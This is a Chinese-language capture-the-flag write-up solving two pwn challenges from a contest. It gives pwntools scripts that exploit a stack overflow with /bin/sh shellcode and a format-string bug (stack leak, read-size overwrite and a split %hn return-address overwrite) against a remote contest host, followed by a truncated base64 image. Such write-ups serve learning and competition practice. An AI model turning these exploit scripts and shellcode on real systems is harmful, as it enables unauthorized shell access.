i春秋30强挑战赛pwn解题过程

80pts:

栈溢出，gdb调试发现发送29控制eip，nx：disabled，所以布置好shellcode后getshell

from pwn import *

#p=process('./tc1')

p=remote('106.75.9.11',20000)

nop='\x90'*19

buf='\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80'

payload=p32(0x804a0a0+4)+nop+buf

p.recvuntil('4. Divide\n')

#gdb.attach(p)

p.sendline('')

p.recvuntil('[123 110]\n')

p.sendline(payload)

p.interactive()

100pts:

反编译看出漏洞为格式化字符串，nx：disabled，思路就是在栈上布置shellcode，但是限定输入长度16bytes，所以得先修改read size。分三步利用：第一次泄漏栈地址，第二次修改参数（大于511即可），第三次修改ret地址，注意栈地址偏大，一次写入不行，思考很久，分两次写入，第一次通过%$hn先写两字节，第二次通样在+2偏移处写两字节就能成功写栈上shellcode地址到printf的ret处，改变执行流程getshell。(这题才100points，不应该啊：( )

int __cdecl main(int argc, const char **argv, const char **envp)

{

  signed int v3; // eax@2

  signed int v6; // [sp+10h] [bp-210h]@1

  int v7; // [sp+1Ch] [bp-204h]@4

  int v8; // [sp+21Ch] [bp-4h]@1

  v8 = *MK_FP(__GS__, );

  v6 = ;

  setvbuf(stdout, , , );

  ssignal(, tooslow);

  alarm();

  while (  )

  {

    v3 = ;

    if ( v6 <=  )

      v3 = v6;

    v6 = v3;

    printf("Reading %d bytes\n", v3);

    read_until(&v7, v6, );

    printf((const char *)&v7);//格式化漏洞

    putchar();

    alarm();

  }

}

.text:0804F5A0                 sub     esp, 1Ch        ; Alternative name is '_IO_printf'

.text:0804F5A3                 lea     eax, [esp+1Ch+arg_4]

.text:0804F5A7                 mov     [esp+1Ch+var_14], eax

.text:0804F5AB                 mov     eax, [esp+1Ch+arg_0]

.text:0804F5AF                 mov     [esp+1Ch+var_18], eax

.text:0804F5B3                 mov     eax, stdout

.text:0804F5B8                 mov     [esp+1Ch+var_1C], eax

.text:0804F5BB                 call    vfprintf

.text:0804F5C0                 add     esp, 1Ch

.text:0804F5C3                 retn              ；需要控制printf函数的ret

.text:0804F5C3 printf          endp

#!/usr/bin/env python

from pwn import *

import binascii

#p = process('./echo-200')

p = remote("106.75.9.11", '')

#........leak stack........

payload1='%x%x%x%x%x'

print p.recvuntil('bytes\n')

p.sendline(payload1)

print p.recvuntil('10a010')

adr=p.recvuntil('\n').split('\n')[0]

#........caculate address........

v=int(adr,16)

print hex(v)

addr=p32(v-0xc)

ebp=int(adr,16)+0x20c

k=v-0x20

q=v+0x20

c1=(q>>16) & 0xffff

c2=q & 0xffff

#........change the buf size........

p.recvuntil('bytes\n')

payload2=addr+'%510x'+'%7$hn'

p.sendline(payload2)

#........change ret address to excute shellcode........

buf =  ""

buf += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x89\xe0\xdd\xc7\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49"

buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"

buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"

buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"

buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x70\x6a\x74\x4b\x62"

buf += "\x78\x5a\x39\x72\x72\x62\x46\x35\x38\x46\x4d\x42\x43"

buf += "\x4b\x39\x69\x77\x43\x58\x56\x4f\x54\x33\x45\x38\x37"

buf += "\x70\x63\x58\x54\x6f\x45\x32\x62\x49\x30\x6e\x4c\x49"

buf += "\x6b\x53\x71\x42\x5a\x48\x73\x38\x75\x50\x47\x70\x43"

buf += "\x30\x74\x6f\x65\x32\x50\x69\x50\x6e\x66\x4f\x54\x33"

buf += "\x32\x48\x43\x30\x42\x77\x56\x33\x6c\x49\x38\x61\x78"

buf += "\x4d\x6f\x70\x41\x41"

#gdb.attach(p)

payload3=p32(k)+p32(k+2)+'%%%dx'%(c2-4)+'%7$hn'+'%%%dx'%(c1-c2-4)+'%8$hn'+buf

p.recvuntil('bytes\n')

print "payload3:"+payload3

p.sendline(payload3)

p.interactive()

aaarticlea/png;base64,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